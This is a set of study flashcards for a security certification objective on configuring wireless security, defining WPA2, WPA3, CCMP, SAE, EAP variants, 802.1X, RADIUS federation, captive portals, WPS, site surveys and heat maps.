3.4 Given a scenario, install and configure wireless security settings. Flashcards
WiFi Protected Access 2 (WPA2)
Wi-Fi Protected Access 2 (WPA2) is the final version of WPA agreed on by the Wi-Fi Alliance; it implements all aspects of the ratified 802.11i security standard and is mandatory in the Wi-Fi certification process.
WiFi Protected Access 3 (WPA3)
WPA3, also known as Wi-Fi Protected Access 3, is the third iteration of a security certification program developed by the Wi-Fi Alliance. WPA3 is the latest, updated implementation of WPA2, which has been in use since 2004. The Wi-Fi Alliance began to certify WPA3-approved products in 2018.
Counter-mode/CBC-MAC
Protocol (CCMP)
Counter Mode Cipher Block Chaining Message Authentication Code Protocol or CCM mode Protocol is an encryption protocol designed for Wireless LAN products that implements the standards of the IEEE 802.11i amendment to the original IEEE 802.11
Simultaneous Authentication of Equals (SAE)
Simultaneous Authentication of Equals (SAE) is a password-based key exchange method developed for mesh networks. Defined in RFC 7664, it uses the Dragonfly protocol to perform a key exchange and is secure against passive monitoring. SAE is not a new protocol;
Extensible Authentication
Protocol (EAP)
The Extensible Authentication Protocol (EAP) is a protocol for wireless networks that expands on authentication methods used by the Point-to-Point Protocol (PPP). PPP is a protocol that was commonly used to directly connect devices to each other. EAP is defined in RFC 2284 (obsoleted by 3748).
Protected Extensible Authentication Protocol (PEAP)
PEAP, or Protected EAP, was developed to protect EAP communication by encapsulating it with Transport Layer Security (TLS). This is an open standard developed jointly by Cisco, Microsoft, and RSA. EAP was designed assuming a secure communication channel. PEAP provides that protection as part of the protocol via a TLS tunnel.
EAP-FAST
EAP-FAST (EAP Flexible Authentication via Secure Tunneling) is described in RFC 4851 and proposed by Cisco to be a replacement for LEAP, a previous Cisco version of EAP. It offers a lightweight tunneling protocol to enable authentication. The distinguishing characteristic is the passing of a Protected Access Credential (PAC) that is used to establish a TLS tunnel through which client credentials are verified. The Wi-Fi Alliance added EAP-FAST to its list of supported protocols for WPA/WPA2/WPA3
EAP-TLS
EAP-TLS is an Internet Engineering Task Force (IETF) open standard (RFC 5216) that uses the TLS protocol to secure the authentication process. EAP-TLS relies on TLS, an attempt to standardize the Secure Sockets Layer (SSL) structure to pass credentials. This is still considered one of the most secure implementations, primarily because common implementations employ client-side certificates.
EAP-TTLS
EAP-TTLS (which stands for EAP–Tunneled TLS) is a variant of the EAP-TLS protocol. EAP-TTLS works much the same way as EAP-TLS, with the server authenticating to the client with a certificate, but the protocol tunnels the client side of the authentication, allowing the use of legacy authentication protocols such as Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), Microsoft Challenge Handshake Authentication Protocol (MS-CHAP), and MS-CHAP-V2. In EAP-TTLS, the authentication process is protected by the tunnel from man-in-the-middle attacks, and although client-side certificates can be used, they are not required, making this easier to set up than EAP-TLS to clients without certificates. The Wi-Fi Alliance added EAP-TTLS to its list of supported protocols for WPA/WPA2/WPA3.
IEEE 802.1X
IEEE 802.1X is an authentication standard that supports port-based authentication services between a user and an authorization device, such as an edge router. IEEE 802.1X is commonly used on wireless access points as a port-based authentication service prior to admission to the wireless network. WPA2-Enterprise uses IEEE 802.1X to establish a secure connection between devices. IEEE 802.1X over wireless uses either IEEE 802.11i or an EAP-based protocol such as EAP-TLS or PEAP-TLS.
Remote Authentication Dial-in User Service (RADIUS) Federation
Using a series of RADIUS servers in a federated connection has been employed in several worldwide RADIUS federation networks. One example is the project eduroam (short for education roaming), which connects users of education institutions worldwide. The process is relatively simple in concept, although the technical details to maintain the hierarchy of RADIUS servers and routing tables is daunting at a worldwide scale.
Captive portals
Captive portal refers to a specific technique of using an HTTP client to handle authentication on a wireless network. Frequently employed in public hotspots, a captive portal opens a web browser to an authentication page. This occurs before the user is granted admission to the network. The access point uses this simple mechanism by intercepting all packets and returning the web page for login
Wi-Fi Protected Setup (WPS)
Wi-Fi Protected Setup (WPS) is a network security standard created to provide users with an easy method of configuring wireless networks. Designed for home networks and small business networks, this standard involves the use of an eight-digit PIN to configure wireless devices. WPS consists of a series of EAP messages and has been shown to be susceptible to a brute force attack.
Site surveys
When developing a coverage map for a complex building site, you need to take into account a wide variety of factors—particularly walls, interfering sources, and floor plans. A site survey involves several steps: mapping the floor plan, testing for RF interference, testing for RF coverage, and analyzing material via software. The software can suggest placement of access points. This is an example of a predictive site survey analysis.
Heat maps
Wi-Fi heat map is a map of wireless signal coverage and strength. Typically, a heat map shows a layout of a room, floor, or facility overlaid by a graphical representation of a wireless signal. Heat maps are created using a Wi-Fi analyzer and software to allow the analysis of Wi-Fi signal strength in the form of a graphical layout.